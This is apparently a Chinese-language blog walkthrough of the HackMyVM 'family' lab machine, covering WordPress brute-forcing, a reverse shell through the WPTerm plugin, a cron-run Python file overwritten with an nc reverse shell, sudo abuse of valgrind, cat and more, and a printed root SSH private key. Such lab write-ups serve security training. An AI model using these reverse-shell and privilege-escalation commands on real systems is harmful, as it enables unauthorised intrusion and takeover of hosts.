guayu-kakeru
0%

HMV-family

发表于 分类于

HMV-family靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.12  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 10:41 CST
Nmap scan report for 192.168.112.12 (192.168.112.12)
Host is up (0.0024s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 0d:4e:fd:57:05:8f:d0:d6:1d:67:5d:6d:4e:b5:c9:fc (RSA)
|   256 d4:98:fb:a7:94:bd:0c:c6:a8:60:5b:bc:b9:c7:f4:51 (ECDSA)
|_  256 fa:34:3a:25:74:40:99:fc:4f:60:be:db:7e:7f:93:be (ED25519)
80/tcp open  http    Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-02-06 07:33  wordpress/
|_
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 06:66:FC:0B:B7:E2 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.38 ms 192.168.112.12 (192.168.112.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds

开放80 和 22端口,而且80端口是wordpress

web探测

直接访问web端,有一个文件夹,点开内容:

但是用wpscan直接扫描说这个站点不是wordpress,但是我提交这个输入框的时候跳转的页面的url变了,所以我们这里修改hosts文件
修改之后就可以正常进入wordpress的登录界面了,默认都在/wp-admin

然后用bp抓包,指定用户名为admin爆破密码
得到密码 phantom

成功进入wordpress界面

接着安装WPTerm插件,让他可以执行shell指令 https://wordpress.org/plugins/wpterm/
在工具这就能找到这个插件

nc 192.168.112.83 1234 -e /bin/bash输入反弹shell指令,成功得到www-datashell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234                
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script -qc /bin/bash /dev/null
www-data@family:/var/www/html/wordpress$ stty raw -echo; fg
stty raw -echo; fg
bash: fg: current: no such job
www-data@family:/var/www/html/wordpress$ ^Z
zsh: suspended  nc -lp 1234
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# stty raw -echo; fg
[1]  + continued  nc -lp 1234
                             reset: unknown terminal type unknown
Terminal type? xterm

提权

去家目录看到一共有三个用户

1
2
www-data@family:/var/www/html/wordpress$ ls /home
baby  father  mother

可以找到www用户的历史记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@family:/var/www$ cat .bash_history 
export TERM=xterm
clear
cd /home
ls
cd baby
cd mother
cd father
clear
find / -group www-data -type f 2>/dev/null | grep -v /var/www
find / -group www-data -type f 2>/dev/null | grep -v -E "/var/www|proc"
cat /usr/share/perl/5.28.1/perso.txt
ls -l /usr/share/perl/5.28.1/perso.txt
su - father
export TERM=xterm
clear
sudo -l

www-data@family:/var/www$ cat /usr/share/perl/5.28.1/perso.txt
uncrackablepassword

发现有一个可疑的文件,他访问过这个文件之后就切换到father用户了
我们用这个密码尝试之后,果然可以切换到father用户

father

他的目录下面什么都没有,没有sudo 没有suid,下一步从本机下载pspy64看看定时任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.112.12 - - [13/Feb/2025 12:52:51] "GET /pspy64 HTTP/1.1" 200 -

father@family:~$ wget 192.168.112.83/pspy64
--2025-02-13 05:52:50--  http://192.168.112.83/pspy64
Connecting to 192.168.112.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                       100%[=============================================>]   2.96M  --.-KB/s    in 0.09s   

2025-02-13 05:52:51 (33.1 MB/s) - ‘pspy64’ saved [3104768/3104768]

father@family:~$ chmod +x pspy64
father@family:~$ ./pspy64

2025/02/13 05:54:01 CMD: UID=1001  PID=963    | /bin/sh -c python ~/check.py

可以看到uid为1001的用户定时执行他的家目录下面的check.py文件
从/etc/passwd中能找到1001是mother

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
father@family:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
father:x:1000:1000:father,,,:/home/father:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
mother:x:1001:1001:,,,:/home/mother:/bin/bash
baby:x:1002:1002:,,,:/home/baby:/bin/bash

同时father是mother这个文件夹的组成员,有写入权限,所以我们写一个py文件的反弹shell

1
2
3
4
5
6
7
8
father@family:/home/mother$ cat check.py 
import os
os.system("nc 192.168.112.83 1235 -e /bin/bash")

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1235  
id
uid=1001(mother) gid=1001(mother) groups=1001(mother)

成功弹回mother的shell

mother

1
2
3
4
5
6
mother@family:~$ sudo -l
Matching Defaults entries for mother on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mother may run the following commands on family:
    (baby) NOPASSWD: /usr/bin/valgrind

mother可以不用密码的就用baby用户执行/usr/bin/valgrind
找到valgrind的sudo利用方式,这个可以直接得到一个bash
得到baby的bash

1
2
3
4
5
6
7
mother@family:/usr/bin$ sudo -u baby /usr/bin/valgrind /bin/bash 
==1324== Memcheck, a memory error detector
==1324== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1324== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info
==1324== Command: /bin/bash
==1324== 
baby@family:/usr/bin$

baby

1
2
3
4
5
6
baby@family:/usr/bin$ sudo -l
Matching Defaults entries for baby on family:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family:
    (ALL : ALL) NOPASSWD: /usr/bin/cat

发现baby可以直接读取任意文件了 先尝试读取flag,但是发现没有这个文件

1
2
baby@family:/usr/bin$ sudo /usr/bin/cat /root/*.txt
/usr/bin/cat: '/root/*.txt': No such file or directory

那就去读.ssh/id_rsa 先去拿root的私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
baby@family:/usr/bin$ sudo cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAnbuWFqguL1RgxPF2kO1Fv1pC4BIFjxOp+ATX3k4WvuJyEdrcAFB5
esn89B6TTKjBffemI/Ppb6/KQ+RXjgh5ZtEzxmRHhO9v9OAcXm76M/0wmG49v+nD79y53b
KFMjcsqwvHZXjn4b3Wk1myQTC2sP763UNfBfd5ZH9uViBqT3NZQNrmzV8V534fZsGeHsMf
vvdbU5yRWlQIHypurKs5jKtwXnRJqpTnDkics2SBcqaL+1ivwZIyNlBvdS7YZBoxRasLG5
3UKg4SIc9K3ujdYtCDYYSGjRxHQLIDRx1wGDo4Bn3jBbZsHqT6A3mpx367jx08WHlcy+eb
hGyuXtnBrwAAA8CBizlZgYs5WQAAAAdzc2gtcnNhAAABAQCdu5YWqC4vVGDE8XaQ7UW/Wk
LgEgWPE6n4BNfeTha+4nIR2twAUHl6yfz0HpNMqMF996Yj8+lvr8pD5FeOCHlm0TPGZEeE
72/04Bxebvoz/TCYbj2/6cPv3LndsoUyNyyrC8dleOfhvdaTWbJBMLaw/vrdQ18F93lkf2
5WIGpPc1lA2ubNXxXnfh9mwZ4ewx++91tTnJFaVAgfKm6sqzmMq3BedEmqlOcOSJyzZIFy
pov7WK/BkjI2UG91LthkGjFFqwsbndQqDhIhz0re6N1i0INhhIaNHEdAsgNHHXAYOjgGfe
MFtmwepPoDeanHfruPHTxYeVzL55uEbK5e2cGvAAAAAwEAAQAAAQBKCYUXuXWETczmZJjM
yjLU8N83If5t/ELp4gwZkvnmO5BjhSGDHEMJOcp8I+XsM8IvCJF5isHl5NPCLmpShvPFKS
luVB+l7GXWwWNPiDP1N0EaK5TcgjOwYSD1SRhwS6mx1+OOY8QkF+GiZJXhN6ZpSiYiub7e
pBzc6Vu3HZwJElUCvAuCxDbazc+RUT9VzH2BdQ3w1D66T8c3ruuRD8P86s0zf7/Bo/OmBi
YeT/X3QcjyZTgmPjBR/m7nZNVUaDgWMCzIx2OecXX2bhdIVnpgVZVSq+EpidgvOPa/bjfQ
AXB5vEuQ7lGz15Hx2isz5ai/zAKIGY33omnDT3f4ESvRAAAAgCkSIIvDtArb/6jXQb57In
aExbm6PurE05TEHj/COnGSjD0iWk6CFFs33ud1A4FX1ACEVkEh51KBukSGhOXHd/nAH56i
pL4h5vmyt3JqLlilSkRju2oOH1I5edxIbTHD5aFHssD3l2OSaO4ax/h42BVp+Xr63FdDbS
NV8qd9gYp7AAAAgQDM02e+O6t1J+X41VaGRuJTnYCfWXKA5KnmmDM5UKQHm4i0dXL9xWgE
bBrFggoE2XsowMLRGOPe0ijuXOkgkpCeSB/rxmQ+Nn2x2O/H7yoIgl1IbpNIK6EZTaCebC
lfdn0hK55BSl394ql0y4ns91E4XL0Xvc9RDlBvGF5BAd/KwwAAAIEAxSQf51F5oIYIvl4l
9y3g77L+VlV0Yg9iLunUT/km9abp9e2oTsNXN3e9IHja5GVxOUjhlBC8Yposlv/oaAApJu
KC9XLqjqEmpo5gq61fG0HRPOkt1DKNuR3zIrWHot0DificHPyGISeu1/oR8tr9OR6Hmlvh
+AY4rKYqqUj+hqUAAAALcm9vdEBmYW1pbHk=
-----END OPENSSH PRIVATE KEY-----

┌──(root㉿kakeru)-[~/tmp]
└─# chmod 600 id_rsa                                  
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# ssh root@192.168.112.12 -i id_rsa
The authenticity of host '192.168.112.12 (192.168.112.12)' can't be established.
ED25519 key fingerprint is SHA256:c8APAkc6cpobBp5TlsyZ0NGBR6ZK9zbWY5binXumQhU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.112.12' (ED25519) to the list of known hosts.


                          oooo$$$$$$$$$$$$oooo
                      oo$$$$$$$$$$$$$$$$$$$$$$$$o
                   oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o         o$   $$ o$
   o $ oo        o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o       $$ $$ $$o$
oo $ $ "$      o$$$$$$$$$    $$$$$$$$$$$$$    $$$$$$$$$o       $$$o$$o$
"$$$$$$o$     o$$$$$$$$$      $$$$$$$$$$$      $$$$$$$$$$o    $$$$$$$$
  $$$$$$$    $$$$$$$$$$$      $$$$$$$$$$$      $$$$$$$$$$$$$$$$$$$$$$$
  $$$$$$$$$$$$$$$$$$$$$$$    $$$$$$$$$$$$$    $$$$$$$$$$$$$$  """$$$
   "$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     "$$$
    $$$   o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     "$$$o
   o$$"   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$       $$$o
   $$$    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$$ooooo$$$$o
  o$$$oooo$$$$$  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$   o$$$$$$$$$$$$$$$$$
  $$$$$$$$"$$$$   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$     $$$$""""""""
 """"       $$$$    "$$$$$$$$$$$$$$$$$$$$$$$$$$$$"      o$$$
            "$$$o     """$$$$$$$$$$$$$$$$$$"$$"         $$$
              $$$o          "$$""$$$$$$""""           o$$$
               $$$$o                 oo             o$$$"
                "$$$$o      o$$$$$$o"$$$$o        o$$$$
                  "$$$$$oo     ""$$$$o$$$$$o   o$$$$""  
                     ""$$$$$oooo  "$$$o$$$$$$$$$"""
                        ""$$$$$$$oo $$$$$$$$$$       
                                """"$$$$$$$$$$$        
                                    $$$$$$$$$$$$       
                                     $$$$$$$$$$"      
                                      "$$$""""





--More--(99%)

但是在里面没法用命令,而且一会就断开连接。
这里看了wp知道要去看看公钥

1
2
3
baby@family:/usr/bin$ sudo cat /root/.ssh/authorized_keys
command="bash ~/troll.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdu5YWqC4vVGDE8XaQ7UW/WkLgEgWPE6n4BNfeTha+4nIR2twAUHl6yfz0HpNMqMF996Yj8+lvr8pD5FeOCHlm0TPGZEeE72/04Bxebvoz/TCYbj2/6cPv3LndsoUyNyyrC8dleOfhvdaTWbJBMLaw/vrdQ18F93lkf25WIGpPc1lA2ubNXxXnfh9mwZ4ewx++91tTnJFaVAgfKm6sqzmMq3BedEmqlOcOSJyzZIFypov7WK/BkjI2UG91LthkGjFFqwsbndQqDhIhz0re6N1i0INhhIaNHEdAsgNHHXAYOjgGfeMFtmwepPoDeanHfruPHTxYeVzL55uEbK5e2cGv root@family

这里发现公钥中执行了troll.sh文件,去看看这个脚本里面有什么

1
2
3
4
5
baby@family:/usr/bin$ sudo cat /root/troll.sh
#!/bin/sh
export TERM=xterm
more /root/welcome.txt
exit 0

发现这里使用了more去读取了welcome.txt,在gofobins中找到跳出这个受限shell的办法

1
2
!/bin/bash
root@family:~#

成功拿到rootshell 结束

总结

学到了wordpress在可以安装插件的时候的通杀方法,安装WPTerm这个插件来反弹shell。
在提权过程中 查看.bash_history找到敏感文件位置
最后了解了valgrind可以运行/bin/bash直接得到一个bash
ssh登录有问题的时候,看看公钥文件,~/authorized_keys
学习了more指令跳出受限bash的方法 !/bin/bash
这里再了解一些more如果有sudo权限的提权方式

1
2
TERM= sudo more /etc/profile
!/bin/sh